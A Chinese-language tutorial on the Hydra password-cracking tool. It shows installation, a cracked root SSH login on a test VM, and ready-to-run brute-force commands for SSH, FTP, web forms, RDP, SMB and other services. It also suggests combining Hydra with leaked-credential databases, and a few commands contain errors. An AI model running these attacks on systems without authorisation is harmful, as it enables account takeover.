hydra簡易破解教程

1、安裝hydra

hydra是世界頂級密碼暴力密碼破解工具，支持幾乎所有協議的在線密碼破解，功能強大，其密碼能否被破解關鍵取決於破解字典是否足夠強大。在網絡安全滲透過程中是一款必備的測試工具，配合社工庫進行社會工程學攻擊，有時會獲得意想不到的效果。

系統是 centos7.4，其他發行版本都可以，用源碼進行安裝，先安裝依賴庫文件

yum install openssl-devel pcre-develncpfs-devel postgresql-devel libssh-devel subversion-devel python-devel libevent-devel

git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra/
./configure
make
make install

2、測試虛擬機

[root@localhost thc-hydra]# hydra 192.168.138.134 ssh -l root -P ../passwd.txt -V -o save.log
Hydra v9.1-dev (c) 2019 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-10-27 22:25:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking ssh://192.168.138.134:22/
[ATTEMPT] target 192.168.138.134 - login "root" - pass "123456" - 1 of 3 [child 0] (0/0)
[ATTEMPT] target 192.168.138.134 - login "root" - pass "123" - 2 of 3 [child 1] (0/0)
[ATTEMPT] target 192.168.138.134 - login "root" - pass "abc" - 3 of 3 [child 2] (0/0)
[22][ssh] host: 192.168.138.134 login: root password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-10-27 22:25:18

3、參數示例

暴力破解：
 hydra（九頭蛇）
  參數：
    -R 繼續從上一次進度接着破解
    -S 大寫，采用SSL鏈接
    -s 小寫，可通過這個參數指定非默認端口
    -l 指定破解的用戶，對特定用戶破解
    -L 指定用戶名字典
    -p 小寫，指定密碼破解，少用，一般是采用密碼字典
    -P 大寫，指定密碼字典
    -e 可選選項，n：空密碼試探，s：使用指定用戶和密碼試探
    -C 使用冒號分割格式，例如“登錄名:密碼”來代替-L/-P參數
    -M 指定目標列表文件一行一條
    -o 指定結果輸出文件
    -f 在使用-M參數以后，找到第一對登錄名或者密碼的時候中止破解
    -t 同時運行的線程數，默認為16
    -w 設置最大超時的時間，單位秒，默認是30s
    -v /-V顯示詳細過程
   
  各協議的具體命令：
    格式+示例：

    1、破解ssh：
    hydra -L 用戶名字典 -p 密碼字典 -t 線程 -vV -e ns ip ssh
    hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

    2、破解ftp：
    hydra ip ftp -L 用戶名字典 -P 密碼字典 -t 線程(默認16) -vV
    hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

    3、get方式提交，破解web登錄：
    hydra -L 用戶名字典 -p 密碼字典 -t 線程 -vV -e ns ip http-get/admin/
    hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get/admin/index.PHP

    4、post方式提交，破解web登錄：
    hydra --L 用戶名字典 -P 密碼字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
    參數說明：
    -t同時線程數3，-l用戶名是admin，字典pass.txt，保存為out.txt，-f 當破解了一個密碼就停止， 
    10.36.16.18目標ip，http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示

    5、破解https：
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
    6、破解teamspeak：
    hydra -L 用戶名字典 -P 密碼字典 -s 端口號 -vV ip teamspeak
 
    7、破解cisco：
    hydra -P pass.txt 10.36.16.18 cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
 
    8、破解smb：
    hydra -L 用戶名字典 -P pass.txt 10.36.16.18 smb
 
    9、破解pop3：
    hydra -l muts -P pass.txt my.pop3.mail pop3
 
    10、破解rdp：
    hydra ip rdp -l administrator -P pass.txt -V
 
    11、破解http-proxy：
    hydra -l admin -P pass.txt http-proxy://10.36.16.18